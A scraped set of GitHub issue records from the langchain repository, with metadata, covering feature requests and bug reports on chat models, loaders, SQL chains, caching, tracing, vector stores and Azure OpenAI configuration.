2023-05-16T13:31:55Z
2024-02-14T03:35:22Z
https://github.com/langchain-ai/langchain/issues/4783
1,712,039,344
4,783
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi guys, it is my understanding that for GPT4 we have to use the ChatOpenAI api. Due to the more restrictive rate limit for GPT4 the use of map_reduce chains seems very limited. ### Suggestion: Provide a configurable batch_size - like in #1073 - for the ChatOpenAI api
ChatOpenAI: Number of parallel jobs in the MapReduce chain
https://api.github.com/repos/langchain-ai/langchain/issues/4782/comments
2
2023-05-16T13:29:08Z
2023-10-16T14:08:56Z
https://github.com/langchain-ai/langchain/issues/4782
1,712,034,290
4,782
[ "langchain-ai", "langchain" ]
### Feature request Add GPT4All chat model integration to Langchain ### Motivation I am building a chat-bot using langchain and the openAI Chat model. However, I have seen that langchain added the GPT4All integration around version 0.0.130 to use it as an LLM provider. I would like to know if there is any intention to add a GPT4All Chat Model to langchain in the near future. I would like to build the chat-bot using LLMs stored locally. ### Your contribution I have been going through all commits in order to upgrade from my local langchain version to the new one, so I might be able to help a little bit if needed
GPT4All Chat Model Integration
https://api.github.com/repos/langchain-ai/langchain/issues/4779/comments
6
2023-05-16T10:51:16Z
2023-12-19T00:50:53Z
https://github.com/langchain-ai/langchain/issues/4779
1,711,766,113
4,779
[ "langchain-ai", "langchain" ]
### Feature request The Airbyte loader should place some separator token between attributes from different records in the final document to help the LLM associating the right attributes with each other ### Motivation The Airbyte loaders loads data from the Airbyte local JSON destination into documents. As Airbyte's atomic unit is a record in the form of a JSON object, the Airbyte loader is stringifying these into the form of `key: value\n`. However, if there are a lot of records, the final document looks like this: Raw data ``` {"_airbyte_ab_id":"f0bcb1da-baaa-4f09-b210-68fa5747ad7c","_airbyte_emitted_at":1684226166938,"_airbyte_data":{"id":91,"make":"Pontiac","model":"Vibe","year":2006,"price":12134,"created_at":"2021-01-11T22:30:14+00:00"}} {"_airbyte_ab_id":"cde6ea19-3f93-4f7a-9042-f5836ca752ac","_airbyte_emitted_at":1684226166938,"_airbyte_data":{"id":92,"make":"Volkswagen","model":"Eos","year":2011,"price":53128,"created_at":"2021-01-12T23:25:06+00:00"}} {"_airbyte_ab_id":"dfbc15a5-bcb7-4676-8615-6341d29b21d3","_airbyte_emitted_at":1684226166939,"_airbyte_data":{"id":93,"make":"Mazda","model":"Mazdaspeed6","year":2007,"price":90902,"created_at":"2021-12-29T14:29:03+00:00"}} ``` Document: ``` id: 91 make: Pontiac model: Vibe year: 2006 price: 12134 created_at: 2021-01-11T22:30:14+00:00 id: 92 make: Volkswagen model: Eos year: 2011 price: 53128 created_at: 2021-01-12T23:25:06+00:00 id: 93 make: Mazda model: Mazdaspeed6 year: 2007 price: 90902 created_at: 2021-12-29T14:29:03+00:00 ``` Running a `RetrievalQA` on this document asking for `How much is a Volkswagen Eos?`, the final answer is `The price of a Volkswagen Eos is 12134` which is wrong (it's the price of the Pontiac right above it, but that's hard to tell from the list of attributes) Adding a separator between the records, the document would look like this: ``` id: 91 make: Pontiac model: Vibe year: 2006 price: 12134 created_at: 2021-01-11T22:30:14+00:00 -end of record- id: 92 make: Volkswagen model: Eos 
year: 2011 price: 53128 created_at: 2021-01-12T23:25:06+00:00 -end of record- id: 93 make: Mazda model: Mazdaspeed6 year: 2007 price: 90902 created_at: 2021-12-29T14:29:03+00:00 ``` The same chain and question now gives the final answer `The price of a Volkswagen Eos is 53128.` which is correct. Alternatively we could completely change the stringification strategy here and instead of producing key-value pairs serializing the array of records as YAML: * Simple to do as there are libs for that * Still little overhead for structural tokens (way less than JSON) * Also has record-separators (the `-` and indentation) * LLMs know how YAML works so it's probably beneficial for interpreting structure in complex nested records ### Your contribution Happy to put together a PR for this, both options explained above are simple to do.
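The proposed key-value stringification with a record separator can be sketched in a few lines (field names mirror the example above; the separator text itself is arbitrary):

```python
# Join per-record "key: value" blocks with an explicit separator so the LLM
# can tell where one record ends and the next begins.
records = [
    {"id": 91, "make": "Pontiac", "model": "Vibe", "price": 12134},
    {"id": 92, "make": "Volkswagen", "model": "Eos", "price": 53128},
]

def stringify(record: dict) -> str:
    return "\n".join(f"{k}: {v}" for k, v in record.items())

document = "\n-end of record-\n".join(stringify(r) for r in records)
print(document)
```

The YAML alternative mentioned above would replace `stringify` with a YAML dump of the record list, trading a few structural tokens for indentation and `-` item markers the model already knows how to read.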
Improve Airbyte loader to help LLM differentiate entities
https://api.github.com/repos/langchain-ai/langchain/issues/4776/comments
5
2023-05-16T08:49:32Z
2023-09-19T16:10:46Z
https://github.com/langchain-ai/langchain/issues/4776
1,711,556,396
4,776
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.169 ### Who can help? @hwchase17 @ekzh ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` import os import langchain import openai from langchain.llms import AzureOpenAI from langchain.chat_models import AzureChatOpenAI from langchain.embeddings import OpenAIEmbeddings llmconfig = { "openai_api_key": "<secret>", "openai_api_base": "https://myllm.openai.azure.com/", "deployment_name": "davinci", } chatconfig = { "model_name": "gpt-35-turbo", "openai_api_type": "azure", "openai_api_version": "chatVERSION", "openai_api_key": "<secret>", "openai_api_base": "https://mychat.openai.azure.com/", "deployment_name": "gpt-35-turbo", } embedderconfig = { "openai_api_key": "<secret>", "model": "ada", "openai_api_base": "https://myembedder.openai.azure.com/", "openai_api_version": "embedderVERSION", "deployment": "ada", } # First time llm = AzureOpenAI(**llmconfig) print(openai.api_version) chat = AzureChatOpenAI(**chatconfig) print(openai.api_version) embedder = OpenAIEmbeddings(**embedderconfig) print(openai.api_version) print("\n") # Second time llm = AzureOpenAI(**llmconfig) print(openai.api_version) chat = AzureChatOpenAI(**chatconfig) print(openai.api_version) embedder = OpenAIEmbeddings(**embedderconfig) print(openai.api_version) ``` This code will return the following: ``` None chatVERSION embedderVERSION embedderVERSION chatVERSION embedderVERSION ``` ### Expected behavior The LangChain classes should not alter the global openai module values, because this could cause conflicts when multiple classes are using those. 
For example if using Chat/Completion API and Embeddings API use a different `api_version` value. Or when using Chat/Completion from Azure and Embeddings from OpenAI, because the classes share the same openai global values, depending on the order of operations there will be unexpected behaviours. Related issues: #2683 #4352 Related PR: https://github.com/hwchase17/langchain/pull/4234 https://github.com/pieroit/cheshire-cat/pull/195 Related code: https://github.com/hwchase17/langchain/blob/a7af32c274860ee9174830804301491973aaee0a/langchain/chat_models/azure_openai.py#L79-L87 and https://github.com/hwchase17/langchain/blob/a7af32c274860ee9174830804301491973aaee0a/langchain/embeddings/openai.py#L166-L178
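A direction for the fix can be sketched without any OpenAI dependency: have each wrapper capture its settings per instance (and pass them per request) instead of writing them into the shared module state. `SafeClient` below is purely illustrative, not a LangChain class:

```python
# Per-instance configuration: construction order no longer matters because
# no constructor mutates shared module-level state.
class SafeClient:
    def __init__(self, api_base, api_version):
        self._api_base = api_base        # instance-local copy
        self._api_version = api_version

    def request(self, path):
        return f"{self._api_base}/{path}?api-version={self._api_version}"

chat = SafeClient("https://mychat.openai.azure.com", "chatVERSION")
embedder = SafeClient("https://myembedder.openai.azure.com", "embedderVERSION")

# Each client keeps its own base and version, regardless of creation order:
print(chat.request("chat/completions"))
print(embedder.request("embeddings"))
```

In practice this means the LangChain classes would pass `api_base`/`api_version`/`api_key` explicitly on every `openai` call rather than assigning them to the `openai` module at import or construction time.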
LangChain classes share openai global values
https://api.github.com/repos/langchain-ai/langchain/issues/4775/comments
14
2023-05-16T08:48:53Z
2023-06-13T18:15:13Z
https://github.com/langchain-ai/langchain/issues/4775
1,711,555,266
4,775
[ "langchain-ai", "langchain" ]
### Feature request I find this version can only support faiss-cpu; does it also support faiss-gpu? Maybe we can add something like annoy, hnswlib and so on ### Motivation add more embedding search tools: faiss, annoy, hnswlib ### Your contribution support more embedding search tools
Does this version also support faiss-gpu?
https://api.github.com/repos/langchain-ai/langchain/issues/4773/comments
1
2023-05-16T08:11:11Z
2023-09-10T16:17:19Z
https://github.com/langchain-ai/langchain/issues/4773
1,711,486,994
4,773
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Context: I'm trying to chat with my dataset of customer reviews from a restaurant chain. I would like to have the LLM make a summary for every single store individually. I found it difficult to generate the expected output using any type of chain, so alternatively I preprocess my dataset before ingesting. I save the reviews as one text file per store (there are around 20 stores, which means I created 20 text files in total). Then I embedded the 20 files into one vectordb, code as below chain = RetrievalQAWithSourcesChain.from_chain_type( llm=model, chain_type="stuff", retriever=db.as_retriever(), chain_type_kwargs=chain_type_kwargs, reduce_k_below_max_tokens=True ) my prompt is something like "make a summary of customer reviews per store", however only 4 stores got a summary generated. I guess only 4 documents were returned as context? Is there any solution where, with one single prompt, I can instruct the LLM to generate summaries for all 20 stores? thanks. ### Suggestion: _No response_
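The behavior described above is expected: a retriever only returns the top-k most similar chunks, so a single prompt can never guarantee coverage of all 20 stores. A more reliable pattern is to loop over stores and summarize each one separately, then combine the results. The sketch below uses a toy `summarize` stand-in for a real per-store summarize chain (e.g. `load_summarize_chain(llm, chain_type="map_reduce").run(docs)`), which is an assumption, not code from this issue:

```python
# Summarize each store independently so no store is dropped by top-k retrieval.
reviews_by_store = {
    "store_a": ["Great food", "Slow service"],
    "store_b": ["Friendly staff"],
}

def summarize(reviews):
    # stand-in for a per-store summarize chain call
    return f"{len(reviews)} reviews"

summaries = {store: summarize(revs) for store, revs in reviews_by_store.items()}
print(summaries)
```

If the documents carry a `store` metadata field, the same loop works against one shared vectorstore by filtering the retriever per store instead of keeping 20 separate files.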
Challenge when using LangChain for customer review analysis.
https://api.github.com/repos/langchain-ai/langchain/issues/4772/comments
7
2023-05-16T08:06:51Z
2023-09-19T16:10:51Z
https://github.com/langchain-ai/langchain/issues/4772
1,711,479,747
4,772
[ "langchain-ai", "langchain" ]
### System Info windows 10 ### Who can help? @vowelparrot @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I just followed the fake LLM tutorial: https://python.langchain.com/en/latest/modules/models/llms/examples/fake_llm.html my code is as follows: from langchain.llms.fake import FakeListLLM from langchain.agents import load_tools from langchain.agents import initialize_agent from langchain.agents import AgentType tools = load_tools(["python_repl"]) responses=[ "Action: Python REPL\nAction Input: print(2 + 2)", "Final Answer: 4" ] llm = FakeListLLM(responses=responses) agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) agent.run("whats 2 + 2") ### Expected behavior code works like in the official tutorial
KeyError: 'tools' when initialize_agent with python_repl tool
https://api.github.com/repos/langchain-ai/langchain/issues/4769/comments
6
2023-05-16T06:44:22Z
2023-09-19T16:10:56Z
https://github.com/langchain-ai/langchain/issues/4769
1,711,345,791
4,769
[ "langchain-ai", "langchain" ]
### System Info env python == 3.10.10 langchain==0.0.170 mysql==5.7 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ` db_chain = SQLDatabaseSequentialChain.from_llm(llm, db, verbose=True, return_direct=True, use_query_checker=True, return_intermediate_steps=True) with get_openai_callback() as cb: restult=db_chain("New energy vehicle sales in 2022?") print(restult) print(cb) ` Expected behavior Entering new SQLDatabaseSequentialChain chain... Table names to use: ['t_passenger_car_monthly_sales'] Entering new SQLDatabaseChain chain New energy vehicle sales in 2022? SQLQuery:The original query seems correct and does not contain any of the common mistakes listed. 
Therefore, the original query is: SELECT SUM(monthly_retail_sales) AS total_sales FROM t_passenger_car_monthly_sales WHERE passenger_car_type = 'passenger_car' AND yearly = 2022 --------------------------------------------------------------------------- ProgrammingError Traceback (most recent call last) File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/sqlalchemy/engine/base.py:1900] in Connection._execute_context(self, dialect, constructor, statement, parameters, execution_options, *args, **kw) 1899 if not evt_handled: -> 1900 self.dialect.do_execute( 1901 cursor, statement, parameters, context 1902 ) 1904 if self._has_events or self.engine._has_events: File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/sqlalchemy/engine/default.py:736], in DefaultDialect.do_execute(self, cursor, statement, parameters, context) 735 def do_execute(self, cursor, statement, parameters, context=None): --> 736 cursor.execute(statement, parameters) File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/cursors.py:158], in Cursor.execute(self, query, args) 156 query = self.mogrify(query, args) --> 158 result = self._query(query) 159 self._executed = query File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/cursors.py:325] in Cursor._query(self, q) 324 self._clear_result() --> 325 conn.query(q) 326 self._do_get_result() File [~/opt/anaconda3/envs/py310/lib/python3.10/site-packages/pymysql/connections.py:549], in Connection.query(self, sql, unbuffered) 548 self._execute_command(COMMAND.COM_QUERY, sql) ... ProgrammingError: (pymysql.err.ProgrammingError) (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'The original query seems correct and does not contain any of the common mistakes' at line 1") [SQL: The original query seems correct and does not contain any of the common mistakes listed. 
Therefore, the original query is: SELECT SUM(monthly_retail_sales) AS total_sales FROM t_passenger_car_monthly_sales WHERE passenger_car_type = 'passenger_car' AND yearly = 2022] (Background on this error at: https://sqlalche.me/e/14/f405)
The exception 'SQLDatabaseSequentialChain or SQLDatabaseChain configuration parameter use_query_checker=True' occurred.
https://api.github.com/repos/langchain-ai/langchain/issues/4768/comments
4
2023-05-16T06:26:18Z
2023-10-30T16:07:03Z
https://github.com/langchain-ai/langchain/issues/4768
1,711,325,729
4,768
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. _No response_ ### Suggestion: _No response_
Will the langchain support ChatGLM?
https://api.github.com/repos/langchain-ai/langchain/issues/4766/comments
4
2023-05-16T05:59:26Z
2023-10-17T16:07:29Z
https://github.com/langchain-ai/langchain/issues/4766
1,711,294,010
4,766
[ "langchain-ai", "langchain" ]
### System Info I just set up a local tracing server, I change the port to 8005. ![image](https://github.com/hwchase17/langchain/assets/110331827/b06d5948-1676-46b6-a8e3-3c4e01cf35e8) when I visit localhost:4173, It shows: ![image](https://github.com/hwchase17/langchain/assets/110331827/abae4119-1c2d-4470-9ba2-1986f6762e65) and the error is: ``` langchain-langchain-frontend-1 | ➜ Local: http://localhost:4173/ langchain-langchain-frontend-1 | ➜ Network: http://172.18.0.4:4173/ langchain-langchain-backend-1 | INFO: Application startup complete. langchain-langchain-backend-1 | INFO: Uvicorn running on http://0.0.0.0:8005 (Press CTRL+C to quit) langchain-langchain-frontend-1 | TypeError: fetch failed langchain-langchain-frontend-1 | at fetch (/app/node_modules/undici/index.js:105:13) langchain-langchain-frontend-1 | at process.processTicksAndRejections (node:internal/process/task_queues:95:5) langchain-langchain-frontend-1 | at async fetchData (file:///app/.svelte-kit/output/server/entries/pages/sessions/_page.server.ts.js:7:17) langchain-langchain-frontend-1 | at async file:///app/.svelte-kit/output/server/index.js:489:86 langchain-langchain-frontend-1 | at async Promise.all (index 0) langchain-langchain-frontend-1 | at async unwrap_promises (file:///app/.svelte-kit/output/server/index.js:489:9) langchain-langchain-frontend-1 | at async load_server_data (file:///app/.svelte-kit/output/server/index.js:537:25) langchain-langchain-frontend-1 | at async file:///app/.svelte-kit/output/server/index.js:1500:18 ``` ### Who can help? 
@agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction run ```langchain-server``` in terminal ### Expected behavior how to fix this bug?
some thing wrong with tracing
https://api.github.com/repos/langchain-ai/langchain/issues/4762/comments
2
2023-05-16T03:44:42Z
2023-06-09T10:09:26Z
https://github.com/langchain-ai/langchain/issues/4762
1,711,172,396
4,762
[ "langchain-ai", "langchain" ]
### Feature request My local LAN has restricted network access, so I need to reach api.openai.com through a reverse proxy. How can I change the address that the langchain package uses to access ChatGPT to my proxy address? ### Motivation My local LAN has restricted network access, so I need to reach api.openai.com through a reverse proxy. How can I change the address that the langchain package uses to access ChatGPT to my proxy address? ### Your contribution The project I am using is gpt4-pdf-chatbot-langchain
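One common approach (a sketch, not an official answer — the proxy URL below is a placeholder) is to point the OpenAI client at the reverse proxy via the `OPENAI_API_BASE` environment variable, which both the `openai` SDK and langchain's OpenAI wrappers read; the equivalent constructor parameter is `openai_api_base`:

```python
import os

# Assumed reverse-proxy endpoint -- replace with your own address.
# Both the openai package and langchain's OpenAI wrappers read this variable.
os.environ["OPENAI_API_BASE"] = "https://my-proxy.example.com/v1"

# The equivalent constructor parameter (sketch, not executed here):
#   llm = OpenAI(openai_api_base="https://my-proxy.example.com/v1")
base = os.environ["OPENAI_API_BASE"]
print(base)
```

Note that gpt4-pdf-chatbot-langchain is a JavaScript project, so the env-var name may need checking against langchainjs.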
How to change the default api.openai.com request address used by the langchain package? I need to access api.openai.com through a proxy
https://api.github.com/repos/langchain-ai/langchain/issues/4759/comments
4
2023-05-16T01:32:10Z
2023-12-06T17:46:15Z
https://github.com/langchain-ai/langchain/issues/4759
1,711,067,591
4,759
[ "langchain-ai", "langchain" ]
### System Info langchain=0.017 python=3.9.16 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction ``` from gptcache import Cache from gptcache.manager.factory import manager_factory from gptcache.processor.pre import get_prompt from langchain.cache import GPTCache import hashlib # Avoid multiple caches using the same file, causing different llm model caches to affect each other def get_hashed_name(name): return hashlib.sha256(name.encode()).hexdigest() def init_gptcache(cache_obj: Cache, llm: str): hashed_llm = get_hashed_name(llm) cache_obj.init( pre_embedding_func=get_prompt, data_manager=manager_factory(manager="map", data_dir=f"map_cache_{hashed_llm}"), ) langchain.llm_cache = GPTCache(init_gptcache) llm("Tell me a joke") ``` ### Expected behavior import hashlib
Have resolved:GPTcache :[Errno 63] File name too long: "similar_cache_[('_type', 'openai'), ('best_of', 2), ('frequency_penalty', 0), ('logit_bias', {}), ('max_tokens', 256), ('model_name', 'text-davinci-002'), ('n', 2), ('presence_penalty', 0), ('request_timeout', None), ('stop', None), ('temperature', 0.7), ('top_p', 1)]
https://api.github.com/repos/langchain-ai/langchain/issues/4757/comments
1
2023-05-16T01:14:21Z
2023-05-19T23:35:38Z
https://github.com/langchain-ai/langchain/issues/4757
1,711,055,714
4,757
[ "langchain-ai", "langchain" ]
### Feature request Capability to retrieve relevance scores along with documents has been added to VectorStoreRetriever as part of PR#4359. The search_type == "similarity_score_threshold" alternative is handled in the sync flow (VectorStoreRetriever.get_relevant_documents) but not in the async flow (VectorStoreRetriever.aget_relevant_documents). This request is to add handling of search_type "similarity_score_threshold" to the VectorStoreRetriever async flow. ### Motivation The feature is necessary to get relevancy/similarity scores as part of a chatbot using ConversationalRetrievalChain and vector stores in streaming (thus async) mode. Previous PR implementing search_type == "similarity_score_threshold": https://github.com/hwchase17/langchain/pull/4359 ### Your contribution I can eventually work on this feature and submit a PR after setting up the whole environment (it would be my first PR on this project though)
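A minimal sketch of what the missing async branch could look like (names, scores, and the threshold are illustrative; the real change would mirror the sync branch inside `VectorStoreRetriever.aget_relevant_documents` and call the store's async scored search):

```python
import asyncio

# Stand-in for the vector store's async scored search; in langchain this
# would be VectorStore.asimilarity_search_with_relevance_scores().
async def asimilarity_search_with_relevance_scores(query: str):
    return [("doc-a", 0.92), ("doc-b", 0.55), ("doc-c", 0.81)]

async def aget_relevant_documents(query: str, score_threshold: float = 0.8):
    # Mirror of the sync handling added in PR#4359: fetch (doc, score)
    # pairs, then keep only documents at or above the threshold.
    docs_and_scores = await asimilarity_search_with_relevance_scores(query)
    return [doc for doc, score in docs_and_scores if score >= score_threshold]

docs = asyncio.run(aget_relevant_documents("example query"))
print(docs)  # ['doc-a', 'doc-c']
```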
search_type "similarity_score_threshold" is missing on async aget_relevant_documents
https://api.github.com/repos/langchain-ai/langchain/issues/4756/comments
2
2023-05-16T01:10:03Z
2023-06-06T12:39:39Z
https://github.com/langchain-ai/langchain/issues/4756
1,711,052,281
4,756
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I just tried the [gptcache](https://python.langchain.com/en/latest/modules/models/llms/examples/llm_caching.html?highlight=cache#gptcache) using ChatOpenAI ```python from gptcache import Cache from gptcache.adapter.api import init_similar_cache from langchain.cache import GPTCache # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: Cache, llm): init_similar_cache(cache_obj=cache_obj, data_dir=f"similar_cache_{llm}") langchain.llm_cache = GPTCache(init_gptcache) ``` ```python %%time llm([HumanMessage(content="Translate this sentence from English to Bahasa Indonesia. I love programming.")]) ``` ``` CPU times: user 30 ms, sys: 1.96 ms, total: 31.9 ms Wall time: 1.15 s AIMessage(content='Saya suka pemrograman.', additional_kwargs={}, example=False) ``` ```python %%time llm([HumanMessage(content="Translate this sentence from English to Bahasa Indonesia. I love programming.")]) ``` ``` CPU times: user 4.15 ms, sys: 1.91 ms, total: 6.05 ms Wall time: 1.34 s AIMessage(content='Saya suka pemrograman.', additional_kwargs={}, example=False) ``` The second execution's wall time is even longer, so the cache has clearly been missed. Can anyone confirm? ### Suggestion: _No response_
Question: Does Chat Model support caching?
https://api.github.com/repos/langchain-ai/langchain/issues/4755/comments
1
2023-05-16T01:09:04Z
2023-05-16T01:23:30Z
https://github.com/langchain-ai/langchain/issues/4755
1,711,051,594
4,755
[ "langchain-ai", "langchain" ]
### System Info 0.0.170, Linux-5.15.90.1-microsoft-standard-WSL2-x86_64-with-glibc2.31, Python 3.9 ```python Generative_Result_Message = """Given the following schema table, sql query and sql result. Provide a human readable answer to the question {sql_answering_document} Question: {question} Resulting Query: {sql_query} Return only the answer to the question and create your own human readable answer based off the sql result and sql query Below is the query result: """ SQL_RESULT_PROMPT = PromptTemplate( input_variables=["question", "sql_query", "sql_answering_document"], template=Generative_Result_Message, ) generative_result_llm = ChatOpenAI( model_name="gpt-4", temperature=self.temperature, openai_api_key=settings.OPENAI_API_KEY, client=get_client(), ) generative_result_llm_chain = LLMChain( llm=generative_result_llm, prompt=self.SQL_RESULT_PROMPT ) generative_result_reduce_chain = StuffDocumentsChain( llm_chain=generative_result_llm_chain, document_variable_name="sql_answering_document", ) combine_documents = MapReduceDocumentsChain( llm_chain=generative_result_llm_chain, combine_document_chain=generative_result_reduce_chain, document_variable_name="sql_answering_document", ) map_reduce = MapReduceChain( combine_documents_chain=combine_documents, text_splitter=CharacterTextSplitter(), ) result = map_reduce.run( { "question": document["generated_question"], "sql_query": sql_query, "sql_answering_document": "sql_answering_document", "input_text": query_result }) ``` This is the error log I'm getting > > answer = map_reduce( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 142, in __call__ > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 136, in __call__ > self._call(inputs, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/mapreduce.py", line 89, in _call > outputs = self.combine_documents_chain.run( > File 
"/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 243, in run > return self(kwargs, callbacks=callbacks)[self.output_keys[0]] > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 142, in __call__ > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/base.py", line 136, in __call__ > self._call(inputs, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/combine_documents/base.py", line 84, in _call > output, extra_return_dict = self.combine_docs( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/combine_documents/map_reduce.py", line 144, in combine_docs > results = self.llm_chain.apply( > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 160, in apply > raise e > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 157, in apply > response = self.generate(input_list, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 80, in generate > prompts, stop = self.prep_prompts(input_list, run_manager=run_manager) > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 108, in prep_prompts > selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} > File "/usr/local/lib/python3.9/site-packages/langchain/chains/llm.py", line 108, in <dictcomp> > selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} > KeyError: 'question' > When I inspected the affected library files and log the data before the method that's triggering the error this is the output > [2023-05-15 23:39:46,775: INFO/ForkPoolWorker-7] kwargs in chains/base.py (part two) kwargs: {'input_documents': [Document(page_content="[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]", metadata={})]} args: () > [2023-05-15 23:39:46,775: INFO/ForkPoolWorker-7] inputs from library file: {'input_documents': 
[Document(page_content="[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]", metadata={})]} > [2023-05-15 23:39:46,776: INFO/ForkPoolWorker-7] input listings from prep_prompts [{'sql_answering_document': "[('2-3 times a week', 4), ('Twice a month', 2), ('Once a week', 2), ('On occasions', 1)]"}] Which is weird, I'm not sure why the prompt inputs would not include the one from the llm I setup ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction N/A ### Expected behavior N/A
LLM Not Receiving prompt ARGS
https://api.github.com/repos/langchain-ai/langchain/issues/4752/comments
0
2023-05-15T23:51:55Z
2023-06-03T21:41:05Z
https://github.com/langchain-ai/langchain/issues/4752
1,710,996,090
4,752
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. How do I stop the stream when using callbacks like the async callback? When I stop the stream, does OpenAI still charge for the remainder of the generation? ### Suggestion: _No response_
How to stop the stream? And does it stop the OpenAI charging?
https://api.github.com/repos/langchain-ai/langchain/issues/4743/comments
7
2023-05-15T20:07:08Z
2024-06-09T09:32:30Z
https://github.com/langchain-ai/langchain/issues/4743
1,710,750,362
4,743
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. [similarity_search](https://github.com/hwchase17/langchain/blob/09587a32014bb3fd9233d7a567c8935c17fe901e/langchain/vectorstores/weaviate.py#L174-L175) in weaviate uses near_text. This requires weaviate to be set up with a [text2vec module](https://weaviate.io/developers/weaviate/modules/retriever-vectorizer-modules). At the same time, the Weaviate wrapper also takes an [embedding model](https://github.com/hwchase17/langchain/blob/09587a32014bb3fd9233d7a567c8935c17fe901e/langchain/vectorstores/weaviate.py#L86) as one of its init parameters. Why don't we use the embedding model to vectorize the search query and then use weaviate's near_vector operator to do the search? ### Suggestion: If a user is using langchain with weaviate, we can assume that they want to use langchain's features to generate the embeddings and as such, will not have any text2vec module enabled.
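The suggested flow — embed the query with the user-supplied embeddings object, then search by vector — can be sketched without a running Weaviate instance. Below, `embed` stands in for `self._embedding.embed_query`, and the cosine ranking stands in for Weaviate's `near_vector` operator (which would be invoked as `.with_near_vector({"vector": qvec})`):

```python
import math

def embed(text: str):
    # Stand-in for the Embeddings object passed to the Weaviate wrapper:
    # word lengths padded/truncated to a fixed 3-dim vector.
    vec = [float(len(w)) for w in text.split()][:3]
    return vec + [0.0] * (3 - len(vec))

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb) if na and nb else 0.0

# Stand-in corpus of already-embedded documents.
corpus = {"doc1": embed("hello wide world"), "doc2": embed("hi to all")}
qvec = embed("hello wide world")  # embed the query client-side ...
best = max(corpus, key=lambda name: cosine(qvec, corpus[name]))  # ... then rank by vector
print(best)  # doc1
```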
Issue: Weaviate: why similarity_search uses with_near_text?
https://api.github.com/repos/langchain-ai/langchain/issues/4742/comments
5
2023-05-15T18:37:07Z
2023-05-17T02:43:16Z
https://github.com/langchain-ai/langchain/issues/4742
1,710,614,532
4,742
[ "langchain-ai", "langchain" ]
